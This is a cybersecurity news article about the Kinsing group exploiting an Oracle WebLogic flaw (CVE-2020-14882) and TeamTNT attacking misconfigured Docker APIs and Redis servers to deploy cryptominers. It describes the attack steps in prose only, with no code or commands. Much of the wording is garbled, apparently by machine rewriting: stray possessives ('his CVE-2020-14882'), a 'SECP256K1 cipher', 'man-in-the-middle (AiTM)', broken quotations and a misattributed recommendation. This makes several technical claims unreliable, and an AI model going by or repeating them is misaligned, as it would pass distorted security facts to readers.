crypto mining

Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies

Malicious actors like Kinsing use both recently discovered and legacy vulnerabilities in Oracle WebLogic Server to propagate cryptocurrency mining malware.

Cybersecurity firm Trend Micro said it has found that financially motivated groups are using vulnerabilities to drop Python scripts with the ability to disable the operating system’s “OS.” Security features such as Security-Enhanced Linux (SELinux).

The operators behind the Kinsing malware have been looking for vulnerable servers to join their botnet, including Redis, SaltStack, Log4Shell, Spring4Shell, and the Atlassian Confluence vulnerability (CVE-2022-26134).

Kinsing actors have also been involved in campaigns against containerized environments via improperly configured open Docker Daemon API ports to launch cryptominers and spread malware to other containers and hosts increase.

The latest wave of attacks includes an attacker weaponizing his CVE-2020-14882 (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, to take control of servers and launch malicious payloads hijacking and deleting.

It’s worth noting that the vulnerability has been exploited in the past by multiple botnets to distribute Monero miners and the Tsunami backdoor on infected Linux systems.

Successful exploitation of the flaw was succeeded by the deployment of a shell script that’s responsible for a series of actions: Removing the /var/log/syslog system log, turning off security features and cloud service agents from Alibaba and Tencent, and killing competing miner processes.

The shell script then proceeds to download the Kinsing malware from a remote server, while also taking steps to ensure persistence by means of cron job.

“The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems,” Trend Micro said. “This can range from malware execution […] to theft of critical data, and even complete control of a compromised machine.”

TeamTNT actors make a comeback with new attacks
The development comes as researchers from Aqua Security identified three new attacks linked to another “vibrant” cryptojacking group called TeamTNT, which voluntarily shut shop in November 2021. “TeamTNT checked the Docker daemon for misconfigurations and deployed a vanilla container image, Alpine, using the command line to download a shell script (k.sh) to the C2 server.”

A notable aspect of the attack chain is that it appears to be designed to crack the SECP256K1 cipher. If this succeeds, the actor will be able to compute keys for each cryptocurrency wallet. In other words, the idea is that he uses a high target but rogue processing power to run the ECDLP solver and get the key.

His two other attacks carried out by this group include exploiting a public Redis server and a misconfigured Docker API to deploy coin miners and Tsunami binaries.

TeamTNT’s alignment with the Docker REST API has been well documented over the past year. However, an operational security flaw discovered by Trend Micro revealed credentials associated with two of his DockerHub accounts controlled by the attacker. The accounts alpineos and sandeep078 were allegedly used to distribute various malicious payloads, including rootkits, Kubernetes exploit kits, credential-stealing tools, the XMRig Monero miner, and even the Kinsing malware.

“The alpineos account was used by him three times in an exploit attempt on our honeypot from mid-September 2021 to early October 2021. We tracked them to their location,” said Trend Micro’s Nitesh Surana.

“The attacker was logged into his DockerHub registry account and may have forgotten to log out.” Or “threat actor logging into his DockerHub account using alpineos credentials.”

Trend Micro said the malicious Alpineos image was downloaded more than 150,000 times by him and notified Docker of those accounts.

He also recommends configuring his REST APIs exposed using TLS to mitigate man-in-the-middle (AiTM) attacks and using credential stores and helpers to host user credentials.

Leave a Comment

Your email address will not be published.